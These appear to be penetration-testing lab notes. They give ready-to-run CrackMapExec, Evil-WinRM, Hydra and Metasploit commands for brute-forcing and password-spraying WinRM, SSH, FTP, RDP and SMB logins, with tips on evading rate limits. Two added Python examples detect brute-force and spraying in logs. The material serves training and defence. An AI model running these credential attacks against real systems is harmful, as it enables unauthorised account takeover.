Cracking Network Services
WinRM
TCP Ports 5985 and 5986
CrackMapExec
usage:
crackmapexec winrm 10.129.42.197 -u user.list -p password.list
Evil-WinRM
install:
sudo gem install evil-winrm
usage:
evil-winrm -i <target-IP> -u <username> -p <password>
evil-winrm -i 10.129.42.197 -u user -p password
SSH
TCP Port 22
SSH uses three different cryptographic methods:
- symmetric encryption
- asymmetric encryption
- hashing
Brute-forcing SSH using Hydra:
hydra -L user.list -P password.list ssh://10.129.42.197
use -s to specify a non-default port
FTP
If FTP is present alongside SSH, it is often much faster to brute-force FTP, since unlike SSH, FTP is not rate-limited:
hydra -l kira -P password.list ftp://10.129.42.197
Specify the port if FTP is running on a non-default port:
hydra -l kira -P password.list ftp://10.129.42.197:2121
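The flip side of the SSH and FTP notes above is what these attempts look like to the target. The following is an added example, not part of the original notes: it parses constructed sshd and vsftpd log lines (the sample log, the threshold of 5 failures and the 60-second window are all assumptions) and flags any source address that produces a burst of failed logins, while a slow, spread-out series of failures stays below the threshold.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (not from the original page). 10.0.0.5 and
# 10.0.0.7 produce fast bursts; 10.0.0.8 fails slowly; 10.0.0.9 is benign noise.
SAMPLE_LOG = """\
Mar 10 12:00:01 srv sshd[2001]: Failed password for invalid user admin from 10.0.0.5 port 40001 ssh2
Mar 10 12:00:02 srv sshd[2002]: Failed password for invalid user root from 10.0.0.5 port 40002 ssh2
Mar 10 12:00:03 srv sshd[2003]: Failed password for kira from 10.0.0.5 port 40003 ssh2
Mar 10 12:00:04 srv sshd[2004]: Failed password for kira from 10.0.0.5 port 40004 ssh2
Mar 10 12:00:05 srv sshd[2005]: Failed password for kira from 10.0.0.5 port 40005 ssh2
Mar 10 12:00:06 srv sshd[2006]: Accepted publickey for deploy from 10.0.0.9 port 50000 ssh2
Mar 10 12:00:07 srv sshd[2007]: Failed password for kira from 10.0.0.9 port 50001 ssh2
Mon Mar 10 12:01:00 2025 [pid 3001] [kira] FAIL LOGIN: Client "10.0.0.7"
Mon Mar 10 12:01:01 2025 [pid 3002] [kira] FAIL LOGIN: Client "10.0.0.7"
Mon Mar 10 12:01:02 2025 [pid 3003] [kira] FAIL LOGIN: Client "10.0.0.7"
Mon Mar 10 12:01:03 2025 [pid 3004] [kira] FAIL LOGIN: Client "10.0.0.7"
Mon Mar 10 12:01:04 2025 [pid 3005] [kira] FAIL LOGIN: Client "10.0.0.7"
Mar 10 12:05:00 srv sshd[2101]: Failed password for kira from 10.0.0.8 port 41001 ssh2
Mar 10 12:07:00 srv sshd[2102]: Failed password for kira from 10.0.0.8 port 41002 ssh2
Mar 10 12:09:00 srv sshd[2103]: Failed password for kira from 10.0.0.8 port 41003 ssh2
Mar 10 12:11:00 srv sshd[2104]: Failed password for kira from 10.0.0.8 port 41004 ssh2
Mar 10 12:13:00 srv sshd[2105]: Failed password for kira from 10.0.0.8 port 41005 ssh2
"""

# sshd syslog line: "Mon DD HH:MM:SS host sshd[pid]: Failed password for [invalid user] USER from IP port N ssh2"
SSH_FAIL = re.compile(
    r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(\S+) from (\S+) port \d+"
)
# vsftpd.log line: "Day Mon DD HH:MM:SS YYYY [pid N] [USER] FAIL LOGIN: Client "IP""
FTP_FAIL = re.compile(
    r'^\w{3} (\w{3} +\d+ \d\d:\d\d:\d\d) \d{4} \[pid \d+\] \[([^\]]+)\] FAIL LOGIN: Client "([^"]+)"'
)
TS_FORMAT = "%b %d %H:%M:%S"  # year is dropped; only deltas matter here


def parse_failures(log_text):
    """Return a list of (timestamp, service, user, source_ip) for failed logins."""
    events = []
    for line in log_text.splitlines():
        m = SSH_FAIL.match(line)
        if m:
            events.append((datetime.strptime(m.group(1), TS_FORMAT), "ssh", m.group(2), m.group(3)))
            continue
        m = FTP_FAIL.match(line)
        if m:
            events.append((datetime.strptime(m.group(1), TS_FORMAT), "ftp", m.group(2), m.group(3)))
    return events


def find_bruteforce(events, threshold=5, window_seconds=60):
    """Flag sources with >= threshold failures inside any window_seconds window."""
    by_source = defaultdict(list)
    for ev in events:
        by_source[ev[3]].append(ev)
    window = timedelta(seconds=window_seconds)
    findings = {}
    for ip, evs in by_source.items():
        evs.sort(key=lambda e: e[0])
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it fits within window_seconds.
            while evs[end][0] - evs[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                findings[ip] = {
                    "services": sorted({e[1] for e in evs}),
                    "users": sorted({e[2] for e in evs}),
                    "failures": len(evs),
                }
                break
    return findings


if __name__ == "__main__":
    for ip, info in find_bruteforce(parse_failures(SAMPLE_LOG)).items():
        print(ip, info)
```

Tune the threshold and window to the service: the point of the FTP note above is that a daemon without its own rate limiting will happily accept hundreds of attempts per minute, so the log is the only place the burst becomes visible.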
RDP
TCP Port 3389
hydra -L user.list -P password.list rdp://10.129.42.197
SMB
TCP Port 445
hydra -L user.list -P password.list smb://10.129.42.197
If you get the error
[ERROR] invalid reply from target smb://10.129.42.197:445/
the installed THC-Hydra is outdated and cannot handle SMBv3 replies; use Metasploit instead:
msfconsole
use auxiliary/scanner/smb/smb_login
set user_file user.list
set pass_file password.list
set rhosts 10.129.42.197
run
Or use CrackMapExec:
crackmapexec smb 10.129.42.197 -u "user" -p "password" --shares
The --continue-on-success flag is useful when spraying a single password against multiple user accounts.
Add the --local-auth flag when working against a Linux Samba SMB server.
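The spraying note above describes one password tried across many accounts, which looks very different in the target's failed-logon records from one account hammered with many passwords. The following is an added example, not part of the original notes: it takes constructed records in the shape of Windows Security event 4625 fields (target user and source address; the records, the minimum of 5 failures and the 0.8 distinct-user ratio are assumptions) and labels each source as a password spray, a brute force, or benign.

```python
from collections import defaultdict

# Constructed failed-logon records (not from any real host), carrying only the
# 4625 fields this check needs: source IpAddress and TargetUserName.
SAMPLE_EVENTS = (
    # 10.0.0.5: one failure each against eight different accounts -> spray
    [{"ip": "10.0.0.5", "user": u}
     for u in ["alice", "bob", "carol", "dave", "erin", "frank", "grace", "heidi"]]
    # 10.0.0.6: eight failures against the same account -> brute force
    + [{"ip": "10.0.0.6", "user": "kira"} for _ in range(8)]
    # 10.0.0.9: two typos from a workstation -> benign
    + [{"ip": "10.0.0.9", "user": u} for u in ["alice", "bob"]]
)


def failures_per_source(events):
    """Map source IP -> {target user -> failure count}."""
    per_source = defaultdict(lambda: defaultdict(int))
    for ev in events:
        per_source[ev["ip"]][ev["user"]] += 1
    return per_source


def classify_sources(events, min_failures=5, spray_ratio=0.8):
    """Label each source: 'benign', 'password-spray', 'brute-force' or 'mixed'.

    A spray has many distinct users relative to total failures (few attempts
    per account, so it stays under per-account lockout thresholds); a brute
    force concentrates all failures on a single account.
    """
    verdicts = {}
    for ip, users in failures_per_source(events).items():
        total = sum(users.values())
        if total < min_failures:
            verdicts[ip] = "benign"
            continue
        distinct = len(users)
        if distinct / total >= spray_ratio:
            verdicts[ip] = "password-spray"
        elif distinct == 1:
            verdicts[ip] = "brute-force"
        else:
            verdicts[ip] = "mixed"
    return verdicts


def sprayed_accounts(events, ip):
    """Accounts touched by a spraying source, sorted for follow-up (reset/notify)."""
    return sorted(failures_per_source(events)[ip])


if __name__ == "__main__":
    verdicts = classify_sources(SAMPLE_EVENTS)
    for ip, verdict in verdicts.items():
        print(ip, verdict)
        if verdict == "password-spray":
            print("  accounts:", ", ".join(sprayed_accounts(SAMPLE_EVENTS, ip)))
```

Per-account lockout alone does not catch a spray, which is exactly why the classification keys on the source address and the distinct-user ratio rather than on failures per account.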
more on SMB